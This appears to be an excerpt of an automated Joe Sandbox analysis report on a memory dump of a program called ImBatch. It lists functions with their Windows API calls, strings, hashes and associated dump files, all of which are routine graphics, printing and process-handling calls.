Instruction ID: 7f106a740e890d6afde03d231b116e46796689c7a5b0a5b5c6731a1db37beb00
Opcode Fuzzy Hash: 63aa032c91d3441bcf5f9ed6cf06fc35e4b02802b6123275b6a72330984e548b
Instruction Fuzzy Hash: CA418074A082089FDB14DFA8D886BDEB7F6FF49304F1080A5E404A7395D7746E49DB90

Uniqueness

Uniqueness Score: -1.00%

Function 1090EEA8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84processsynchronizationCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32 ref: 1090EF63
WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000,00000000,00000000,00000220,00000000,00000000,00000044,?,?,1090EFFC,?,1090EFEC), ref: 1090EF7E
CloseHandle.KERNEL32(?,1090EFB4,00000000,00000000,00000220,00000000,00000000,00000044,?,?,1090EFFC,?,1090EFEC,00000000,1090EFAD), ref: 1090EF9E
CloseHandle.KERNEL32(?,?,1090EFB4,00000000,00000000,00000220,00000000,00000000,00000044,?,?,1090EFFC,?,1090EFEC,00000000,1090EFAD), ref: 1090EFA7

Strings

D, xrefs: 1090EEFB

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: CloseHandle$CreateObjectProcessSingleWait
String ID: D
API String ID: 2059082233-2746444292
Opcode ID: d5e2bc8df7891146827347a1e49c86955a8b47c9f4c6a17e4abd05c2c4afcce8
Instruction ID: 69e029903c5d8643522b0488eef150271f0a71695bf33da82d27d75c72135e13
Opcode Fuzzy Hash: d5e2bc8df7891146827347a1e49c86955a8b47c9f4c6a17e4abd05c2c4afcce8
Instruction Fuzzy Hash: 1A314175D08248AEDF11DFD8CD56B9DBBBDEF49304F104465F204AB294DB75AA04C714

Uniqueness

Uniqueness Score: -1.00%

Function 10871E8C Relevance: 7.7, APIs: 5, Instructions: 161COMMON

Download Yara Rule

APIs

EnumPrintersW.WINSPOOL.DRV(00000001,00000000,00000005,00000000,00000000,?,?,00000000,1087209D,?,00000000,00000000,00000000,?,10871B18,00000001), ref: 10871ED9
GetLastError.KERNEL32(00000001,00000000,00000005,00000000,00000000,?,?,00000000,1087209D,?,00000000,00000000,00000000,?,10871B18,00000001), ref: 10871EE2
GetLastError.KERNEL32(00000001,00000000,00000005,00000000,00000000,?,?,00000000,1087209D,?,00000000,00000000,00000000,?,10871B18,00000001), ref: 10871EEC

Part of subcall function 1080B018: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 1080B05D

EnumPrintersW.WINSPOOL.DRV(00000001,00000000,00000005,?,?,?,?,00000000,10872052,?,00000001,00000000,00000005,00000000,00000000,?), ref: 10871F47
GetDefaultPrinterW.WINSPOOL.DRV(?,00000400,00000001,00000000,00000005,?,?,?,?,00000000,10872052,?,00000001,00000000,00000005,00000000), ref: 10871F6E

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: EnumErrorLastPrinters$DefaultLoadPrinterString
String ID:
API String ID: 3365667171-0
Opcode ID: 834c737d583038eb3bb584474c95a79ac3679a9f43a6d270d62eb8ad545621b2
Instruction ID: 208c24233ce36d3d764712536b1ba155ca58532186becd67a1181153d68c39ee
Opcode Fuzzy Hash: 834c737d583038eb3bb584474c95a79ac3679a9f43a6d270d62eb8ad545621b2
Instruction Fuzzy Hash: C251EA79A086099FDB14DFA9CC81A9EB7F9FF48300F10C5A6E504E7254DB35AE458F90

Uniqueness

Uniqueness Score: -1.00%

Function 10839AB0 Relevance: 7.6, APIs: 5, Instructions: 142COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,?,00000000,10839C52,?,?,00000000,?), ref: 10839B10
CharNextW.USER32(?,?,00000000,10839C52,?,?,00000000,?), ref: 10839BB8
CharNextW.USER32(00000000,?,00000000,10839C52,?,?,00000000,?), ref: 10839BDD
CharNextW.USER32(00000000,00000000,?,00000000,10839C52,?,?,00000000,?), ref: 10839BF5

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: 7df6a75be38af982142d21d6acbc285f7b1dd3dcf36a72c10b129d4226d130d2
Instruction ID: 70f64496fd066af7a3183be7e512fb6882d8f2d2c3bfc17c90d48ea3d195715d
Opcode Fuzzy Hash: 7df6a75be38af982142d21d6acbc285f7b1dd3dcf36a72c10b129d4226d130d2
Instruction Fuzzy Hash: C1512A34A08668DFCB01DF68D890A99BBF5EF86321F4105E0E4819F364D734EE82DB91

Uniqueness

Uniqueness Score: -1.00%

Function 109FFFD6 Relevance: 7.6, APIs: 5, Instructions: 112sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 109F8794: EnterCriticalSection.KERNEL32(?,?,?,10A001B6,00000000,10A5A37C,00000000,10A5A469,?,00000000,10A5A48C,?,?,?,?), ref: 109F879F
Part of subcall function 109F8794: LeaveCriticalSection.KERNEL32(?,?,?,?,10A001B6,00000000,10A5A37C,00000000,10A5A469,?,00000000,10A5A48C,?,?,?,?), ref: 109F87B2

InterlockedExchange.KERNEL32(-00000048,00000001), ref: 10A00005
Sleep.KERNEL32(0000000A,-00000050,00000000,00000000,-00000048,00000001), ref: 10A0001F
InterlockedCompareExchange.KERNEL32(-00000050,00000000,00000000), ref: 10A00036
EnterCriticalSection.KERNEL32(?,-00000048,00000001), ref: 10A0009A
LeaveCriticalSection.KERNEL32(?,10A000E8,00000001), ref: 10A000DB

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: CriticalSection$EnterExchangeInterlockedLeave$CompareSleep
String ID:
API String ID: 1786549734-0
Opcode ID: 7ee6c4d7b75012df27c18f3e79332e6a8a5f077f1724fe39b39b60cb9b697a5b
Instruction ID: af04fbd9167194d4da4b3ab66088828b26ece7d94b313cf051fb9ed88dc6072b
Opcode Fuzzy Hash: 7ee6c4d7b75012df27c18f3e79332e6a8a5f077f1724fe39b39b60cb9b697a5b
Instruction Fuzzy Hash: EB416874A48289AFEB01CF68E995F9DB7E1FB45344F2544B4F804AB256C774AE40CB04

Uniqueness

Uniqueness Score: -1.00%

Function 10856FE4 Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 1085703A
GetDeviceCaps.GDI32(00000000,0000000C), ref: 1085704F
GetDeviceCaps.GDI32(00000000,0000000E), ref: 10857059
CreateHalftonePalette.GDI32(00000000,00000000,?,00000000,?,?,10856D92,?,?,10856B1E,?,?,?,00000000,1090F7A7), ref: 1085707D
ReleaseDC.USER32 ref: 10857088

Part of subcall function 108552E8: LeaveCriticalSection.KERNEL32(10857DDA,1085536B,?,?,?,?,?,?,?,?,?,?,?,?,108557D8,00000000), ref: 1085535E

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: CapsDevice$CreateCriticalHalftoneLeavePaletteReleaseSection
String ID:
API String ID: 3410390442-0
Opcode ID: ae10c4efe9d84b632057d69d51dea3cd458210f9d3457b3a0d79a5e507fc685c
Instruction ID: 2f6535e714da2a5ef7044b82bdb36b5ae5f787b96cf433a6d3ff45f5ef593805
Opcode Fuzzy Hash: ae10c4efe9d84b632057d69d51dea3cd458210f9d3457b3a0d79a5e507fc685c
Instruction Fuzzy Hash: F211BE2160969A9FEB20AE38A841BEE3BC1FF413A1F015121F8049A5C0D7B09998C3A1

Uniqueness

Uniqueness Score: -1.00%

Function 10A3A60B Relevance: 7.6, APIs: 5, Instructions: 57fileCOMMON

Download Yara Rule

APIs

GetDeviceCaps.GDI32(?,0000005A), ref: 10A3A61F
GetDeviceCaps.GDI32(?,00000008), ref: 10A3A62F
GetDeviceCaps.GDI32(?,0000000A), ref: 10A3A63B

Part of subcall function 10A39AA4: SetMapMode.GDI32(00000000,00000001), ref: 10A39AF4
Part of subcall function 10A39AA4: SetTextAlign.GDI32(00000000,00000000), ref: 10A39B03
Part of subcall function 10A39AA4: MulDiv.KERNEL32(?,00000000,00000048), ref: 10A39B43

PlayEnhMetaFile.GDI32(00000000,?,?), ref: 10A3A682
RestoreDC.GDI32(00000000,?), ref: 10A3A6AB

Strings

Printing not allowed!, xrefs: 10A39DD8
Page , xrefs: 10A39E36

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: CapsDevice$AlignFileMetaModePlayRestoreText
String ID: Page $Printing not allowed!
API String ID: 558365637-545845978
Opcode ID: e73e6dda6e046a664acc172dc9b63b6c6b83adfa977cfcee244a560ae5fc7466
Instruction ID: 04a7e496c58460bf5ef72a9ac7d38345b6e79f7d1853a150e89e508674cb9bc5
Opcode Fuzzy Hash: e73e6dda6e046a664acc172dc9b63b6c6b83adfa977cfcee244a560ae5fc7466
Instruction Fuzzy Hash: 86118079A04219AFEB40EBECCD83FAE77BCEB48201F504455B504EB294CB35BD048B65

Uniqueness

Uniqueness Score: -1.00%

Function 10851764 Relevance: 7.6, APIs: 5, Instructions: 55windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 1085177C
GetDeviceCaps.GDI32(?,00000068), ref: 10851798
GetPaletteEntries.GDI32(15080DF1,00000000,00000008,?), ref: 108517B0
GetPaletteEntries.GDI32(15080DF1,00000008,00000008,?), ref: 108517C8
ReleaseDC.USER32 ref: 108517E4

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: EntriesPalette$CapsDeviceRelease
String ID:
API String ID: 3128150645-0
Opcode ID: 52bd87ec2275b7452467b9492cded082d4d1913b9582933b221e8f3855ed506b
Instruction ID: 230f597cbf2661ff805a9bd0a5bd8e4f803b5d2c6eb2e4076227b52596bb2283
Opcode Fuzzy Hash: 52bd87ec2275b7452467b9492cded082d4d1913b9582933b221e8f3855ed506b
Instruction Fuzzy Hash: 0611C03564C304AEEF40DFEC8C82FAE7BACE74A710F508096F514DA2C4DA76A448C720

Uniqueness

Uniqueness Score: -1.00%

Function 1084F00C Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(-00000008,00000000,1084F20E,?,109F4888,00000001), ref: 1084F051
CreateFontIndirectW.GDI32(?), ref: 1084F1B1
LeaveCriticalSection.KERNEL32(?,1084F1E5,-00000008,00000000,1084F20E,?,109F4888,00000001), ref: 1084F1D8

Strings

Default, xrefs: 1084F0FF

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: CriticalSection$CreateEnterFontIndirectLeave
String ID: Default
API String ID: 4254235019-753088835
Opcode ID: 50f063c1ecb97543d8948b6bf8ed16875a47c32958db22f66bc79f06adc057db
Instruction ID: b74c84aa276eaee78b06ab08e12dfa0f67726a26a62b66215a950ed1de632d0b
Opcode Fuzzy Hash: 50f063c1ecb97543d8948b6bf8ed16875a47c32958db22f66bc79f06adc057db
Instruction Fuzzy Hash: 45612534E0828CDFDB01CFA8C889B8DBBF5EB45304F6581A9E810EB356D774AA44CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1080E470 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(10800000,CHARTABLE,0000000A,?,?,1080E32C), ref: 1080E484
LoadResource.KERNEL32(10800000,00000000,10800000,CHARTABLE,0000000A,?,?,1080E32C), ref: 1080E49B
LockResource.KERNEL32(00000000,10800000,00000000,10800000,CHARTABLE,0000000A,?,?,1080E32C), ref: 1080E4AC

Part of subcall function 1081C188: GetLastError.KERNEL32(10871F18,00000001,00000000,00000005,00000000,00000000,?,?,00000000,1087209D,?,00000000,00000000,00000000,?,10871B18), ref: 1081C188

Strings

CHARTABLE, xrefs: 1080E479

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: Resource$ErrorFindLastLoadLock
String ID: CHARTABLE
API String ID: 1074440638-2668339182
Opcode ID: f27292a7fa8e29dd57a09c06b2bde1490b8b3d18018c8e292c1425cfab65bbbe
Instruction ID: ee72a501aa83655ca1ebaade1c7b58c22ce5e61ed50e750f848570ff727a88eb
Opcode Fuzzy Hash: f27292a7fa8e29dd57a09c06b2bde1490b8b3d18018c8e292c1425cfab65bbbe
Instruction Fuzzy Hash: C3016DB87483129FD70CEFBCDCD092977A5EB9831170A456EE50157361CEB8A882CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10A3B502 Relevance: 6.2, APIs: 4, Instructions: 187windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000044E,0000006E,?), ref: 10A3B557
SendMessageW.USER32(?,0000044E,00000074,00000001), ref: 10A3B598
SendMessageW.USER32(?,0000044E,0000006F,00000000), ref: 10A3B60B
SendMessageW.USER32(?,0000044E,00000070,00000000), ref: 10A3B74B

Strings

SELECTED, xrefs: 10A3B186
selected, xrefs: 10A3B360
odd, xrefs: 10A3B2AC
even, xrefs: 10A3B306

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
